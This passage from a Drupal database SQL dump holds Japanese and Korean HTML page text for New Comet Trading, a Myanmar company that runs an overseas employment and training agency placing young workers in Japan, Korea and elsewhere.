lang=\"JA\">ミャンマーの若者達には自分に合ったお仕事や自分らしさをたもちながら、日本の技術を勉強できるようにサポートをし続けたいと努力をしております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span lang=\"JA\">日本語能力試験</span>(JLPT,<span style=\"mso-spacerun:yes;\">&nbsp; </span>JFT, NAT-TEST, TOP-J)<span lang=\"JA\">を合格した生徒はワークビザ、研修ビザなどて、いけるように提案をしております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span lang=\"JA\">我々ニューコメットトレーディング会社からは経験豊富で、能力の高い研修生達を生み出し、海外の仕事チャンスを与えることに重ねて努力をしてまいります。</span><o:p></o:p></p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 23, 190, 'ko', 0, '<p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희</span><span style=\"mso-fareast-language:KO;\"> ``New Comet Trading\'\'&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사는</span><span style=\"mso-fareast-language:KO;\"> 2004</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">설립되어</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사업자등록번호</span><span style=\"mso-fareast-language:KO;\">(295/2004-2005)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">로</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">영업을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">시작하였습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">뉴코멧무역대행</span><span style=\"mso-fareast-language:KO;\"> 2023</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">뉴코멧</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">외국인고용업</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">면허를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취득하여</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">활동을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">시작하였습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희 <strong>뉴코멧</strong></span><span style=\"mso-fareast-language:KO;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>해외직업소개회사</strong>&nbsp;</span><span style=\"mso-fareast-language:KO;\">\"New Comet Overseas Employment Agency\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는자매</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사인&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\"> </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>제야뉴코멧 자동차 판매 및 서비스 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧회사</strong>등</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기업들과</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">협력하여</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">경제통상자원부에서&nbsp;</span><span style=\"mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">차량</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수입허가를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">신청했고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">각종</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">상용트럭</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">관광</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">산업 및</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">운송에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사용되는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">다양한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">유형의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">버스</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">및</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기계를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본에서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직접</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">구매 판매하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사업을</span><span style=\"mso-fareast-language:KO;\"> 25</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">이상&nbsp;</span><span style=\"mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">종사해</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">왔고 나라를 위한 정한 세금들을 냈습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">. </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">게다가</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">100 </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">명 이상의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직원에게</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">고용</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공했습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">또한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">쌍둥이</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사인</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>제야슈웨삐띡 건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>아웅네원 회사</strong>들은 정부</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">부처로부터</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">입찰&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">(tender)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">받고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">건설</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">작업을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">동안</span><span style=\"mso-fareast-language:KO;\"> 200</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">명</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">이상의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직원에게</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">고용</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공했습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"> \"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">뉴코멧 해외 직업 소개회사</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는 한국 조선소로 취업을 희망하는 미얀마 각지에서 온 소수민족 형제들을 교통통신부 산하의 씬마락</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"> (Sinmalike) </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">조선소에서 유능한 트레이너들와 함께 실력있는 용접공이 되도록 수업을 제공하고 있으며 관련 기업체로 취업할 수 있게 도와주고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">또한</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">두바이</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">말레이시아</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">싱가포</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">태국</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본 같은</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국가에서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일하기를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">원하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">청년들에게</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취업</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">받알 수 있도록&nbsp;</span><span style=\"mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스들을 제공하고 있습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-fareast-language:KO;\">New Comet Trading Agency Co.ltd</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미얀마의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">젊은</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">치누들이 일본의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">개발한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">첨단</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기술을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">배우고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">꿈을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">실현할</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있도록</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">교육을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하고 돕고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun 